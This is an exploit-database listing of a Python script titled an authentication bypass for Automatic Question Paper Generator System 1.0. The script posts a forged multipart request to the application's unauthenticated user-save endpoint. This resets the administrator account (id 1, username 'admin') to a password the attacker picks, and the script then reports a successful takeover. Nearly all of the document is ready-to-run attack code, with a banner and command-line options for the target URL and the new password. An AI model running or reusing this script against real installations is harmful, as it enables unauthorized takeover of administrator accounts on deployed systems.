Share
## https://sploitus.com/exploit?id=PACKETSTORM:166288
# Exploit Title: Automatic Question Paper Generator System 1.0 - Authentication Bypass  
# Date: 2022-04-03  
# Exploit Author: Mr Empy  
# Software Link: https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html  
# Version: 1.0  
# Tested on: Linux  
#!/usr/bin/env python3  
import requests  
import random  
import string  
from requests_toolbelt import MultipartEncoder  
from time import sleep  
import argparse  
  
def banner():  
print('''  
___ ____ ____ ______  
/ | / __ \ / __ \/ ____/  
/ /| |/ / / / / /_/ / / __  
/ ___ / /_/ / / ____/ /_/ /  
/_/ |_\___\_\/_/ \____/  
  
[Automatic Question Paper Generator v1.0]  
[Authentication Bypass]  
''')  
  
def main():  
fields = {  
'id': "1",  
'firstname': 'Adminstrator',  
'lastname': 'Admin',  
'username': 'admin',  
'password': arguments.newpassword  
}  
  
boundary = '----WebKitFormBoundary' +  
''.join(random.sample(string.ascii_letters + string.digits, 16))  
m = MultipartEncoder(fields=fields, boundary=boundary)  
  
headers = {  
"Connection": "keep-alive",  
"Content-Type": m.content_type  
}  
  
r = requests.post(f'{arguments.url}/classes/Users.php?f=save',  
headers=headers, data=m)  
if '1' in r.text:  
print(f'[+] Account taken successfully! Login:  
admin:{arguments.newpassword}')  
else:  
print('[-] Not vulnerable')  
  
if __name__ == '__main__':  
parser = argparse.ArgumentParser()  
parser.add_argument('-u','--url', action='store', help='Target URL (  
http://target.com/aqpg/)', dest='url', required=True)  
parser.add_argument('-p','--password', action='store', help='New  
password', dest='newpassword', required=True)  
arguments = parser.parse_args()  
banner()  
sleep(2)  
main()